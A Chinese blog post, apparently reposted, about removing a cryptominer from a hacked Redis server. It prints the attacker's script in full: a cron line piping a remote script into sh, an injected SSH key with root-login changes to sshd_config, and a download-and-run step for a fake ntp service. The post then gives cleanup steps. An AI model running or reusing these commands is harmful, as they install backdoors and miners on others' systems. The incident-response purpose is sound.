天天看點
傳回

被黑客種下惡意程式進行挖礦的排除案例

被黑客種下惡意程式進行挖礦的排除案例

在查詢一個redis一個rbd檔案沒有在指定檔案目錄下進行儲存時發現crontab上有個定時腳本,才發現被攻擊放馬了

#crontab -l

*/10 ** * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh

<a href="http://s1.51cto.com/wyfs02/M00/86/85/wKiom1fCacaibT2UAAHEGIV7V0Q641.png-wh_500x0-wm_3-wmp_4-s_703378670.png" target="_blank"></a>

minerd是什麼

minerd是挖礦程式,黑客入侵後,會利用宿主cpu進行複雜計算,強占cpu資源,使cpu使用率高達100%

下載下傳腳本:

cat  pm.sh

exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh"&gt; /var/spool/cron/root

mkdir-p /var/spool/cron/crontabs

echo"*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh"&gt; /var/spool/cron/crontabs/root

if [ !-f "/root/.ssh/KHK75NEOiq" ]; then

       mkdir -p ~/.ssh

       rm -f ~/.ssh/authorized_keys*

       echo "ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot" &gt; ~/.ssh/KHK75NEOiq

       echo "PermitRootLogin yes"&gt;&gt; /etc/ssh/sshd_config

       echo "RSAAuthentication yes"&gt;&gt; /etc/ssh/sshd_config

       echo "PubkeyAuthentication yes"&gt;&gt; /etc/ssh/sshd_config

       echo "AuthorizedKeysFile.ssh/KHK75NEOiq" &gt;&gt; /etc/ssh/sshd_config

       /etc/init.d/sshd restart

fi

if [ !-f "/etc/init.d/ntp" ]; then

       if [ ! -f"/etc/systemd/system/ntp.service" ]; then

              mkdir -p /opt

              curl -fsSLhttp://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 &amp;&amp;chmod +x /opt/KHK75NEOiq33 &amp;&amp; /opt/KHK75NEOiq33 -Install

       fi

/etc/init.d/ntpstart

psauxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9

psauxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

根據以上腳本内容删除對應的程式檔案及程序

需要處理以下檔案及程序

1、crontab上的指令删除掉

"*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" &gt;/var/spool/cron/root

"*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" &gt;/var/spool/cron/crontabs/root

2、去掉ssh/authorized_keys

~/.ssh/KHK75NEOiq

被替換的/etc/ssh/sshd_config拿其他伺服器上的替換掉。替換後重新開機sshd,記得更改root相關密碼,防止黑客登陸。

3、删除相關管理的黑客程式啟動檔案,僞程序/etc/init.d/ntp删除并kill掉它啟動的程序;

4、/usr/local/etc/minerd.conf裡的minerd啟動配置删除或者直接删除/usr/local/etc/minerd.conf

最後top看看有沒有minerd及ntp程序

沒大工高成。

參照:http://www.mamicode.com/info-detail-1443821.html

本文轉自 holy2009 51CTO部落格,原文連結:http://blog.51cto.com/holy2010/1843509

安全 shell 網絡安全 perl 資料安全/隐私保護 NoSQL Redis php shell讀寫資料 php shell資料 shell讀寫資料 資料管理sql 通過shell資料
上一篇: 理論:賬号和權限管理 理論講解前言: 賬号和權限管理 理論講解一:使用者賬号群組賬号概述二:使用者賬号群組賬号管理三:查詢賬号資訊四:檢視目錄或檔案的屬性六:檢視目錄或檔案的歸屬
下一篇: linux下批量生産使用者賬号

繼續閱讀